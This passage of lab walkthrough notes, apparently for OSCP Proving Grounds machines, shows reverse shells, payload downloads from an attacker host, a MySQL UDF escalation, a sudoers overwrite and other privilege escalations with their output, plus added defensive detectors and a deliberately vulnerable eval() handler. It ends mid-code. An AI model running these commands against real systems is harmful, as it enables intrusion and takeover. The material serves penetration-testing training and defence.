[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 832 | Token: 0x768 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 952
[+] Current Command Length: 26 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 4884
[+] Process Output:
The command completed successfully.
PS C:\Users\nathan>
Proof
┌──(kali㉿kali)-[~/oscp/pg/Billyboss]
└─$ impacket-psexec 'Administrator':'pwn'@'192.168.162.61'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 192.168.162.61.....
[*] Found writable share ADMIN$
[*] Uploading file KobNoVMV.exe
[*] Opening SVCManager on 192.168.162.61.....
[*] Creating service mzDR on 192.168.162.61.....
[*] Starting service mzDR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18362.719]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type c:\users\administrator\desktop\proof.txt
473ba6697c2261e11c5ab2359726456b
C:\Windows\system32>
Craft
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.228.169 | TCP:80 |
Web Enumeration
The site asks users to upload their resume and accepts only .odt files.
Initial Access – ODT macro with revshell
Use Macro Generator to create an ODF file and upload it.
Proof
┌──(kali㉿kali)-[~/oscp/pg/Craft]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.228.169] 49828
whoami
craft\thecybergeek
PS C:\Program Files\LibreOffice\program> cd ~
PS C:\Users\thecybergeek> type desktop\local.txt
f445b235557331d186400f6ff386d15f
PS C:\Users\thecybergeek>
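The macro-bearing .ods mailed to mailadmin on Hepet and the .odt uploaded as a resume here are the same ODF trick: a zip container with a Basic module under Basic/ and an event binding in content.xml that runs it when the document opens. The following is an added example, not code from this write-up or from the macro generators it uses, showing how a mail gateway or upload handler can flag such documents; the sample document and mail it inspects are constructed inline.

```python
"""Flag ODF documents (.ods/.odt) carrying embedded Basic macros, whether read
from disk or extracted from an e-mail attachment.
Constructed example: the sample document and mail are built inline below;
nothing here is taken from a real mailbox."""
import email
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from email import policy
from email.message import EmailMessage

NS_OFFICE = "urn:oasis:names:tc:opendocument:xmlns:office:1.0"
NS_SCRIPT = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
NS_XLINK = "http://www.w3.org/1999/xlink"
NS_BASIC = "http://openoffice.org/2000/script"  # namespace of Basic/<lib>/<module>.xml
# Basic calls that hand control to the operating system.
SUSPICIOUS = re.compile(r"\b(Shell|CreateObject|WScript\.Shell|cmd\.exe|powershell)\b", re.I)


def odf_macro_report(data: bytes) -> dict:
    """Inspect an ODF zip container. The decision rests on the zip contents, not
    the declared MIME type: the mail above labels the .ods as
    application/octet-stream, so a type-based filter would miss it."""
    rep = {"is_odf": False, "modules": [], "suspicious": [], "auto_events": []}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return rep
    names = zf.namelist()
    if "mimetype" in names:
        rep["is_odf"] = zf.read("mimetype").startswith(b"application/vnd.oasis.opendocument")
    # Each Basic module is stored as Basic/<Library>/<Module>.xml with the source as text.
    for name in names:
        if not (name.startswith("Basic/") and name.endswith(".xml")):
            continue
        root = ET.fromstring(zf.read(name))
        if root.tag != f"{{{NS_BASIC}}}module":
            continue  # script-lc.xml / script-lb.xml are library indexes, not code
        rep["modules"].append(name)
        rep["suspicious"] += sorted({m.group(0) for m in SUSPICIOUS.finditer(root.text or "")})
    # An <office:event-listeners> binding in content.xml is what fires a macro on open.
    if "content.xml" in names:
        root = ET.fromstring(zf.read("content.xml"))
        for ev in root.iter(f"{{{NS_SCRIPT}}}event-listener"):
            if ev.get(f"{{{NS_XLINK}}}href", "").startswith("vnd.sun.star.script:"):
                rep["auto_events"].append(ev.get(f"{{{NS_SCRIPT}}}event-name"))
    return rep


def scan_mail(raw: bytes) -> list:
    """Report every attachment that is an ODF container with macro modules or
    auto-run bindings; all other attachments are ignored."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True)
        if not payload:
            continue
        rep = odf_macro_report(payload)
        if rep["is_odf"] and (rep["modules"] or rep["auto_events"]):
            hits.append({"filename": part.get_filename() or "<unnamed>", **rep})
    return hits


# --- constructed fixtures (harmless: the macro only echoes a string) ----------
MACRO_SRC = 'Sub Main\n    Shell("echo constructed-sample")\nEnd Sub\n'


def build_sample_ods(with_macro: bool) -> bytes:
    """Minimal constructed .ods: mimetype + content.xml, optionally one Basic
    module bound to the document's dom:load event."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet",
                    compress_type=zipfile.ZIP_STORED)
        scripts = ""
        if with_macro:
            zf.writestr("Basic/Standard/Module1.xml",
                        f'<script:module xmlns:script="{NS_BASIC}" script:name="Module1" '
                        f'script:language="StarBasic">{MACRO_SRC}</script:module>')
            scripts = ('<office:scripts><office:event-listeners><script:event-listener '
                       'script:event-name="dom:load" script:language="ooo:script" '
                       'xlink:href="vnd.sun.star.script:Standard.Module1.Main'
                       '?language=Basic&amp;location=document"/>'
                       '</office:event-listeners></office:scripts>')
        zf.writestr("content.xml",
                    f'<office:document-content xmlns:office="{NS_OFFICE}" '
                    f'xmlns:script="{NS_SCRIPT}" xmlns:xlink="{NS_XLINK}">'
                    f'{scripts}<office:body/></office:document-content>')
    return buf.getvalue()


def build_sample_mail(attachment: bytes) -> bytes:
    """Constructed mail shaped like the swaks delivery above: a text body plus an
    application/octet-stream attachment named file.ods."""
    msg = EmailMessage()
    msg["From"] = "jonas@localhost"
    msg["To"] = "mailadmin@localhost"
    msg["Subject"] = "test"
    msg.set_content("a")
    msg.add_attachment(attachment, maintype="application", subtype="octet-stream",
                       filename="file.ods")
    return msg.as_bytes()
```

Feeding a clean .ods (no Basic/ entries, no event listeners) through scan_mail returns an empty list, so the check can sit inline on a mail gateway without quarantining ordinary spreadsheets.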
Privilege Escalation – SeImpersonatePrivilege
C:\xampp\htdocs is writable, and the service account holds SeImpersonatePrivilege, so dropping a webshell there yields a reverse shell as the service account.
PS C:\xampp\htdocs> icacls C:\xampp\htdocs
C:\xampp\htdocs CRAFT\apache:(OI)(CI)(F)
CRAFT\apache:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
PS C:\xampp\htdocs> whoami
craft\thecybergeek
PS C:\xampp\htdocs> curl.exe 192.168.45.233:8000/shell.php -o shell.php
PS C:\xampp\htdocs>
Use SigmaPotato.exe
┌──(kali㉿kali)-[~/oscp/pg/Craft]
└─$ rlwrap nc -lvnp 8787
listening on [any] 8787 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.228.169] 49929
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeTcbPrivilege Act as part of the operating system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\xampp\htdocs> curl.exe 192.168.45.233:8000/SigmaPotato.exe -o SigmaPotato.exe
First change the Administrator password to pwn
PS C:\xampp\htdocs> .\SigmaPotato.exe "net user Administrator pwn"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 880 | Token: 0x804 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 992
[+] Current Command Length: 26 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 4708
[+] Process Output:
The command completed successfully.
Download the enable-RDP script from the attacking machine and run it
PS C:\xampp\htdocs> type enablerdp.cmd
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
PS C:\xampp\htdocs> .\SigmaPotato.exe "cmd.exe /c C:\xampp\htdocs\enablerdp.cmd"
[+] Starting Pipe Server...
[+] Created Pipe Name: \\.\pipe\SigmaPotato\pipe\epmapper
[+] Pipe Connected!
[+] Impersonated Client: NT AUTHORITY\NETWORK SERVICE
[+] Searching for System Token...
[+] PID: 880 | Token: 0x804 | User: NT AUTHORITY\SYSTEM
[+] Found System Token: True
[+] Duplicating Token...
[+] New Token Handle: 948
[+] Current Command Length: 40 characters
[+] Creating Process via 'CreateProcessWithTokenW'
[+] Process Started with PID: 4288
[+] Process Output:
C:\Windows\system32>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
C:\Windows\system32>netsh advfirewall firewall set rule group="remote desktop" new enable=yes
The following helper DLL cannot be loaded: RASMONTR.DLL.
The following helper DLL cannot be loaded: DOT3CFG.DLL.
The following helper DLL cannot be loaded: HNETMON.DLL.
The following helper DLL cannot be loaded: NETTRACE.DLL.
The following helper DLL cannot be loaded: NSHIPSEC.DLL.
The following helper DLL cannot be loaded: PEERDISTSH.DLL.
Updated 3 rule(s).
Ok.
PS C:\xampp\htdocs>
Proof

Pebbles
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.52 | TCP:21,22,80,3305,8080 |
Web Enumeration
The site is on port 8080; /zm shows it runs ZoneMinder Console v1.29, which has an SQLi.
Initial Access – SQLI to RCE
Using the exploit's SQL injection parameter, inject a webshell.

Visit /shell.php on the port 3305 site to run the webshell and launch a reverse shell.
The resulting user is www-data, which cannot read local.txt yet; looking at the running services shows mysql runs as root.
www-data@pebbles:/tmp$ ss -tuln
ss -tuln
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 128 :::8080 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 32 :::21 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 128 :::3305 :::*
www-data@pebbles:/tmp$ ps aux | grep mysql
ps aux | grep mysql
root 1152 0.0 20.8 1153680 211832 ? Ssl 22:02 0:00 /usr/sbin/mysqld
www-data 24104 0.0 0.0 11284 944 pts/0 S+ 22:23 0:00 grep mysql
www-data@pebbles:/tmp$
Use the SQLi to change the mysql root password, following HackTricks.



Now mysql can be used.
www-data@pebbles:/tmp$ mysql -uroot -h localhost -pMyNewPass
mysql -uroot -h localhost -pMyNewPass
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 32
Server version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Since mysql is known to run as root, follow HackTricks and use this UDF exploit to escalate privileges.
mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)
mysql> insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so';
Query OK, 1 row affected (0.00 sec)
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
Query OK, 0 rows affected (0.00 sec)
mysql>
With root-level execution available, simply set the SUID bit on /bin/bash.
Proof
mysql> select sys_exec('chmod +s /bin/bash');
select sys_exec('chmod +s /bin/bash');
+--------------------------------+
| sys_exec('chmod +s /bin/bash') |
+--------------------------------+
| 0 |
+--------------------------------+
1 row in set (0.00 sec)
mysql> exit
exit
Bye
www-data@pebbles:/tmp$ ls -lh /bin/bash
ls -lh /bin/bash
-rwsr-sr-x 1 root root 1014K Jul 12 2019 /bin/bash
www-data@pebbles:/tmp$ /bin/bash -p
/bin/bash -p
bash-4.3# cat /root/proof.txt
cat /root/proof.txt
2e5766ea30d43cb95ed66ea95459b517
bash-4.3#
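The load_file / INTO DUMPFILE / CREATE FUNCTION ... SONAME sequence above leaves a recognisable trail in MySQL's general query log. This added detector (not part of the write-up, of HackTricks, or of the UDF exploit) parses general_log lines in FILE format and reports, per connection, which stages of the UDF chain appeared; the log lines it runs over are constructed to mirror the session above.

```python
"""Detect the MySQL UDF-loading chain in general query log lines, per connection.
Constructed example: SAMPLE_LOG is made up to mirror the session above; it is
not taken from any real server."""
import re
from collections import defaultdict

# general_log with log_output=FILE: "<timestamp>\t<conn id> <command>\t<argument>"
LOG_RE = re.compile(r"^(?P<time>\S+)\t\s*(?P<conn>\d+) (?P<cmd>[^\t]+)\t(?P<arg>.*)$")

# Stages of the chain in the order an attacker needs them. Each is legitimate on
# its own (DBAs do install plugins); the combination within one connection is
# the signal. secure_file_priv set to a directory or NULL blocks the first two.
STAGES = (
    ("load_file", re.compile(r"\bLOAD_FILE\s*\(", re.I)),
    ("dumpfile_to_plugin_dir",
     re.compile(r"\bINTO\s+DUMPFILE\s+'[^']*/plugin/[^']*\.(?:so|dll)'", re.I)),
    ("create_udf",
     re.compile(r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\b.*\bSONAME\b", re.I | re.S)),
    ("udf_exec", re.compile(r"\bsys_(?:exec|eval)\s*\(", re.I)),
)


def parse_general_log(lines):
    """Yield [conn, cmd, arg] per statement. A line without the prefix is a
    continuation of a multi-line statement and is appended to the previous one."""
    current = None
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m:
            if current:
                yield current
            current = [m["conn"], m["cmd"], m["arg"]]
        elif current:
            current[2] += "\n" + line.rstrip("\n")
    if current:
        yield current


def detect_udf_chain(lines):
    """Return {conn_id: [stages seen, in order]} for every connection that wrote
    a shared object into the plugin directory or registered a UDF from one."""
    seen = defaultdict(list)
    for conn, cmd, arg in parse_general_log(lines):
        if cmd != "Query":
            continue  # Connect / Quit / Init DB carry no SQL
        for stage, rx in STAGES:
            if rx.search(arg) and stage not in seen[conn]:
                seen[conn].append(stage)
    return {c: s for c, s in seen.items()
            if "dumpfile_to_plugin_dir" in s or "create_udf" in s}


# Constructed log: connection 32 replays the session above, 33 is ordinary app traffic.
SAMPLE_LOG = """\
2020-05-30T22:23:40.101Z\t   32 Connect\troot@localhost on mysql using Socket
2020-05-30T22:23:42.303Z\t   32 Query\tcreate table foo(line blob)
2020-05-30T22:23:43.404Z\t   32 Query\tinsert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'))
2020-05-30T22:23:44.505Z\t   32 Query\tselect * from foo into dumpfile '/usr/lib/mysql/plugin/lib_mysqludf_sys_64.so'
2020-05-30T22:23:45.606Z\t   32 Query\tcreate function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'
2020-05-30T22:23:46.707Z\t   32 Query\tselect sys_exec('chmod +s /bin/bash')
2020-05-30T22:24:00.000Z\t   33 Connect\tzmuser@localhost on zm using TCP/IP
2020-05-30T22:24:01.000Z\t   33 Query\tSELECT * FROM Monitors WHERE Id = 1
"""


def sample_findings():
    """Run the detector over the constructed log."""
    return detect_udf_chain(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for conn, stages in sample_findings().items():
        print(f"connection {conn}: {' -> '.join(stages)}")
```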
Clue
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.240 | TCP:22,80,139,445,3000,8021 |
FTP enumeration
Port 8021 runs FreeSWITCH, which has an RCE vulnerability but requires a password.
Web enumeration
The site runs cassandra-web, which has a remote file read.
Initial Access
Locate the file where FreeSWITCH stores its password, /etc/freeswitch/autoload_configs/event_socket.conf.xml, and read the password.
┌──(kali㉿kali)-[~/oscp/pg/Clue]
└─$ python3 49362 192.168.162.240 -p 3000 /etc/freeswitch/autoload_configs/event_socket.conf.xml
<configuration name="event_socket.conf" description="Socket Client">
<settings>
<param name="nat-map" value="false"/>
<param name="listen-ip" value="0.0.0.0"/>
<param name="listen-port" value="8021"/>
<param name="password" value="StrongClueConEight021"/>
</settings>
</configuration>
Use the exploit, changing it to self.PASSWORD = 'StrongClueConEight021'
Proof
┌──(kali㉿kali)-[~/oscp/pg/Clue]
└─$ rlwrap nc -lvnp 3000
listening on [any] 3000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.240] 45240
whoami
freeswitch
python3 -c 'import pty;pty.spawn("/bin/bash")'
freeswitch@clue:/$ cd ~
cd ~
freeswitch@clue:/var/lib/freeswitch$ ls
ls
db images local.txt recordings storage
freeswitch@clue:/var/lib/freeswitch$ cat local.txt
cat local.txt
cd87c4223a295c13753bc33528d6594e
freeswitch@clue:/var/lib/freeswitch$
privilege escalation
linpeas reveals cassie's password SecondBiteTheApple330
cassie 930 0.0 1.6 623244 34460 ? Ssl 01:44 0:00 /usr/bin/ruby2.5 /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330
After switching to cassie, there is an id_rsa in the home directory; trying it shows it is root's id_rsa.
cassie@clue:~$ ssh root@localhost -i id_rsa
ssh root@localhost -i id_rsa
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Apr 29 17:57:54 2024
root@clue:~# cat /root/proof.txt
cat /root/proof.txt
The proof is in another file
root@clue:~# ls /root
ls /root
proof.txt proof_youtriedharder.txt smbd.sh
root@clue:~# cat /root/proof_youtriedharder.txt
cat /root/proof_youtriedharder.txt
f62d718fb1d06a5a658a09eb5af12404
root@clue:~#
Shenzi
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.55 | TCP:21,80,135,139,443,445,3306,7680 |
SMB enumeration
Anonymous SMB login reveals a file containing WordPress credentials and, most importantly, the path name /shenzi.
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ smbclient //192.168.162.55/Shenzi -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 28 11:45:09 2020
.. D 0 Thu May 28 11:45:09 2020
passwords.txt A 894 Thu May 28 11:45:09 2020
readme_en.txt A 7367 Thu May 28 11:45:09 2020
sess_klk75u2q4rpgfjs3785h6hpipp A 3879 Thu May 28 11:45:09 2020
why.tmp A 213 Thu May 28 11:45:09 2020
xampp-control.ini A 178 Thu May 28 11:45:09 2020
12941823 blocks of size 4096. 6495214 blocks available
smb: \>
Initial Access
Log in at /shenzi/wp-login.php with the obtained credentials admin/FeltHeadwallWight357, then upload and install a wordpress-webshell-plugin.
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ curl -X POST 'http://192.168.162.55/shenzi/wp-content/plugins/wp_webshell/wp_webshell.php' --data "action=exec&cmd=whoami"
{"stdout":"shenzi\\shenzi\r\n","stderr":"","exec":"whoami"}
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.55] 50413
whoami
shenzi\shenzi
PS C:\> cd ~
PS C:\Users\shenzi> type desktop\local.txt
f02c9a772e5593da5d8ef7a458b96f96
PS C:\Users\shenzi>
privilege escalation – abuse Write-UserAddMSI
PowerUp shows that Write-UserAddMSI can be abused.
Check : AlwaysInstallElevated Registry Key
AbuseFunction : Write-UserAddMSI
DefaultDomainName : SHENZI
DefaultUserName : shenzi
DefaultPassword :
AltDefaultDomainName :
AltDefaultUserName :
AltDefaultPassword :
Check : Registry Autologons
See this post for the method.
PS C:\Users\shenzi> cp //192.168.45.228/share/evil.msi .
PS C:\Users\shenzi> msiexec /q /i evil.msi
PS C:\Users\shenzi>
Proof
┌──(kali㉿kali)-[~/oscp/pg/Shenzi]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.55] 49971
Microsoft Windows [Version 10.0.19042.1526]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
Nukem
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.105 | TCP:22,80,3306,5000,13000,36445 |
Web enumeration
The site on port 80 runs WordPress; wpscan finds a plugin with an RCE.
Initial Access
Use the exploit, changing the reverse shell IP and port.
┌──(kali㉿kali)-[~/oscp/pg/Nukem]
└─$ rlwrap nc -lvnp 5000
listening on [any] 5000 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.105] 59552
bash: cannot set terminal process group (350): Inappropriate ioctl for device
bash: no job control in this shell
[http@nukem simple-file-list]$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
[http@nukem simple-file-list]$ cd /home
cd /home
[http@nukem home]$ ls
ls
commander
[http@nukem home]$ cd commander
cd commander
[http@nukem commander]$ cat local.txt
cat local.txt
650e1ccaa35f92bb7f6903dc8c80a5e2
[http@nukem commander]$
privilege escalation – setuid
Checking SUID binaries shows dosbox can be abused (see the reference). The current user is http, so modify /etc/sudoers so that http can run commands through sudo without a password.
Proof
[http@nukem simple-file-list]$ DATA="http ALL=NOPASSWD:ALL"
DATA="http ALL=NOPASSWD:ALL"
[http@nukem simple-file-list]$ LFILE='\etc\sudoers'
LFILE='\etc\sudoers'
[http@nukem simple-file-list]$ /usr/bin/dosbox -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit
<x -c 'mount c /' -c "echo $DATA >>c:$LFILE" -c exit
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:\etc\sudoers
[http@nukem simple-file-list]$ sudo su
sudo su
[root@nukem simple-file-list]# cat /root/proof.txt
cat /root/proof.txt
d6586a7bfffcaf473ba5f38b00b3ca60
[root@nukem simple-file-list]#
Medjed
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.127 | TCP:135,139,445,3306,5040,8000,30021,33033,44330,45332,45443 |
Web enumeration
Port 8000 serves a setup page still waiting to be configured; fill it in with anything, after which Web-File-Server can be selected. It can browse every Windows folder (including administrator's).

Initial Access – file upload to RCE
Upload a webshell directly into the folder where XAMPP stores the web application. XAMPP listens on port 45443.
Proof
┌──(kali㉿kali)-[~/oscp/pg/Medjed]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.127] 50011
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\xampp\htdocs> cd ~
PS C:\Users\Jerren> type desktop\local.txt
2b07982d3503be5f449a0fe11e275415
PS C:\Users\Jerren>
privilege escalation
Checking with PowerUp.ps1 shows that we have modify permission on bd.exe.
PS C:\Users\Jerren> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Jerren>
PS C:\Users\Jerren> . .\PowerUp.ps1
PS C:\Users\Jerren> Invoke-AllChecks
ServiceName : bd
Path : "C:\bd\bd.exe"
ModifiableFile : C:\bd\bd.exe
ModifiableFilePermissions : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'bd'
CanRestart : False
Name : bd
Check : Modifiable Service Files
Generate a reverse shell exe, name it bd.exe, then reboot.
PS C:\bd> cp //192.168.45.228/share/exp.exe .
PS C:\bd> mv exp.exe bd.exe
dir
PS C:\bd>
Directory: C:\bd
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2020 12:29 PM applications
d----- 11/3/2020 12:29 PM cache
d----- 11/3/2020 12:29 PM cmsdocs
d----- 11/3/2020 12:29 PM data
d----- 11/3/2020 12:29 PM themes
d----- 8/1/2024 10:49 PM trace
-a---- 11/3/2020 12:29 PM 38 bd.conf
-a---- 11/3/2020 12:29 PM 259 bd.dat
-a---- 6/11/2025 4:34 AM 7168 bd.exe
-a---- 4/26/2013 5:55 PM 1661648 bd.exe.bak
-a---- 6/12/2011 4:49 PM 207 bd.lua
-a---- 4/26/2013 5:55 PM 912033 bd.zip
-a---- 6/14/2012 12:21 PM 33504 bdctl.exe
-a---- 6/11/2025 4:12 AM 151 dbcfg.dat
-a---- 6/11/2025 4:12 AM 135 drvcnstr.dat
-a---- 6/11/2025 4:12 AM 28 emails.dat
-a---- 12/3/2010 4:52 PM 5139 install.txt
-a---- 10/26/2010 4:38 PM 421200 msvcp100.dll
-a---- 10/26/2010 4:38 PM 770384 msvcr100.dll
-a---- 2/18/2013 10:39 PM 240219 non-commercial-license.rtf
-a---- 8/1/2024 10:49 PM 6 pidfile
-a---- 4/26/2013 5:50 PM 16740 readme.txt
-a---- 6/11/2025 4:12 AM 808 roles.dat
-a---- 6/14/2012 12:21 PM 383856 sqlite3.exe
-a---- 6/11/2025 4:12 AM 78 tuncnstr.dat
-a---- 11/3/2020 12:29 PM 133107 Uninstall.exe
-a---- 6/11/2025 4:12 AM 461 user.dat
PS C:\bd> shutdown -r -t 0
PS C:\bd>
Proof
┌──(kali㉿kali)-[~/oscp/pg]
└─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.45.228] from (UNKNOWN) [192.168.162.127] 49668
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>type c:\users\administrator\desktop\proof.txt
type c:\users\administrator\desktop\proof.txt
d6607916b6fce1744f4c05a055d1d5c6
C:\WINDOWS\system32>
Hetemit
Service Enumeration
Port Scan Results
Server IP Address | Ports Open |
192.168.162.117 | TCP:21,22,80,139,445,18000,50000 |
Web enumeration
The web API on port 50000 (running on Python 3.6.8) has a command injection in its endpoint; the guess is that it runs the input through eval.
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=8*9" http://192.168.162.117:50000/verify
72
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=id" http://192.168.162.117:50000/verify
<built-in function id>
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=8*9" http://192.168.162.117:50000/verify
72
┌──(kali㉿kali)-[~/oscp/pg/Hetemit]
└─$ curl -X POST -d "code=8%2B9" http://192.168.162.117:50000/verify
17
---
Reproducing it with ipython3:
In [15]: code='id'
In [16]: eval(code)
Out[16]: <function id(obj, /)>
In [17]: code='8*9'
In [18]: eval(code)
Out[18]: 72
In [19]:
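The ipython session above reproduces what a handler that hands request input to eval() does. As an added example (not code from the writeup or from the target's app.py), here is that handler beside a hardened version that parses the input with the ast module and only evaluates numeric arithmetic; the function names unsafe_verify, safe_verify and rejects are assumptions.

```python
"""Safe expression evaluation for a /verify-style endpoint (added example)."""
import ast
import operator


# "Before": the behaviour the curl tests above reveal. The request body is
# handed straight to eval(), so any Python expression runs on the server.
def unsafe_verify(code: str):
    return eval(code)  # vulnerable by design; shown only for contrast


# "After": parse the input into an AST and walk it, accepting only numeric
# literals and a fixed set of arithmetic operators. Names, attribute access,
# calls, subscripts and everything else are rejected before anything runs.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
}
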